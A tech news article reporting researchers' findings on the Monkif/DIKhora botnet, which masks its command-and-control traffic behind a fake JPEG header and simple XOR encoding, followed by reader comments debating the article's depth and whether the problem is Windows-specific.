New botnet hides commands as JPEG images

New botnet hides commands as JPEG images

Summary: Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.

SHARE:
TOPICS: Malware, Security
49

Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.

The Monkif/DIKhora botnet, which is pushing out Trojan downloaders to infected machines, is encoding the instructions to appear as if the command-and-control server is returning a JPEG image file, according to SecureWorks researcher Jason Milletary.

Milletary explains:

The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0×4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking.

The Trojan associated with this botnet also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system.

ALSO SEE:

Topics: Malware, Security

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

49 comments
Log in or register to join the discussion
  • What, that's it?

    That's it for this article?

    No mention of how prolific it is; what defenses might exist; how to check for it's presence; anything?

    Without more information, you're fear-mongering. Next time, just type "Boo!".


    finder@...
    • What, that's it?

      "Without more information, you're fear-mongering. Next time, just type "Boo!"."


      I think its called, getting info out there for all to see. Fear mongering? I dont think so.
      Franciscus101
      • Still

        It might help to get some quotes form a few major AV vendors. I would love to know if mine is aware and protecting me against this.
        djmik
        • protecting you against what?


          Protecting you against what? If you are trojaned already, then it's too late.

          this is just an article about C&C. Not sure why everyone is so negative about it. How is it fear mongering to talk about methods of controlling bot-nets?

          Is it the JPEG part that is scaring everyone?
          zdnet-registraion
          • jpeg

            "Is it the JPEG part that is scaring everyone? "
            Unfortunatly... yes.
            Ceridan
    • Huh? The "defenses" are not to join the botnet. Did you even RTFA?

      If you did, you would know there's nothing
      "fearful" about it. Instead of the botnet being
      administered with plain text commands, it's
      being administered with plain text commands
      prefixed by a fake jpeg header. This changes
      nothing.

      In fact it's actually rather pathetic; there
      are already free, open sourced algorithms out
      there for [i]real[/i] steganography, I can't
      believe botnets aren't using such methods for
      their communications yet. This is just sad.
      AzuMao
  • SC Magazine Content

    This article doesn't belong in the wild anymore than a botnet. While it is extremely interesting, you make it sound like the botnet is spreading via JPEG's (which it is not).
    Nothing like a half article (talking about the command and control) without the other half (how is the bot propogating, what does it do, how long has it been out there. You know that basic who,what,where, when, how and why.)
    rjacksix
    • Great post. Botnet is NOT spreading through JPEG

      Excellent point and I want to make sure your post gets read. The botnet is NOT spreading through JPEG. This is probably just another trojan botnet which, according to the ZDNet rules of what counts and what doesn't, doesn't count.

      Oops, I forgot the #1 rule of what counts and what doesn't: If it affects MS software, it counts, no matter what.

      Cue the double standards...
      NonZealot
      • So basically it's just another ordinary bot

        But this one uses JPGs to communicate. If it was really smart the commands would be a watermark that could be in any image. If it was even smarter it would be in plain old HTML too.
        T1Oracle
        • Nope, it isn't even using JPEGs to communicate

          It is using the HTTP content type image/jpeg to hide its communications in a fake JPEG header. If I understand correctly, there isn't even a valid JPEG anywhere in the equation.
          NonZealot
          • true that but

            Unfortunatly, people sees: botnet hides JPEG images.... and not botnet hides commands as JPEG images...
            Ceridan
          • botnet hides commands as JPEG images

            I got it. I don't know who these other people are.
            abeassocs
  • What's with all the posts bagging the article?

    The first line says it all...

    [i]Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.[/i]

    There's a link to the source article (which BTW doesn't have much more info than this one).

    And why is it the authors problem if you misread or misunderstood the article?

    Thanks for the info Ryan!
    iTeaBoy
    • Title Not Even Accurate

      The title isn't even accurate. The commands are not in JPEG images, they emmulate the first few bites but are not "images".
      rjacksix
  • RE: New botnet hides commands as JPEG images

    Another article that fails to tell us that this is a Windows problem.
    gertruded
    • Uh?

      Crafting a header and a content-type is rather easy and it's cross-platform comptatible. So
      hidding COMMANDS as if it's a JPEG to avoid detection of said commands by a firewall is actually interesting...

      And aggain, since HTTP responses are sent as ASCII(cross-browser/cross-platform..etc) you cannot be protected by a method to that a allready resident trojan is using to recive said HTTP responses by simply being on a Mac or on Ubuntu(or other linux).

      Please dont confuse a propagation vector with simply client/server behaviour.

      PS: The trojan might or might not be windows, it does not mather since the article speaks of a communication scheme between a botnet client and a botnet C&C server.

      EDIT: mixed mime and http content-type wich are similar in a way but...
      Ceridan
      • Message has been deleted.

        Media Whore
    • Should I feed the troll gertruded, or not?

      But then again, the more we do, the more you come back with the ususall "Micro$oft sucks, blah, blah, blah" post.

      GuidingLight
      • truth is truth, no matter how often it is repeated

        [i]the more you come back with the ususall "Micro$oft sucks, blah, blah, blah" post.[/i]

        This trojan specifically targets IE by installing a BHO. Naturally, BHOs are specific to IE on Windows.

        So, MSFT will continue to suck until it can create a decently-secure software stack.
        Media Whore
  • Sounds reminiscent of FrogExer

    Using image files doesn't surprise me.
    mechBgon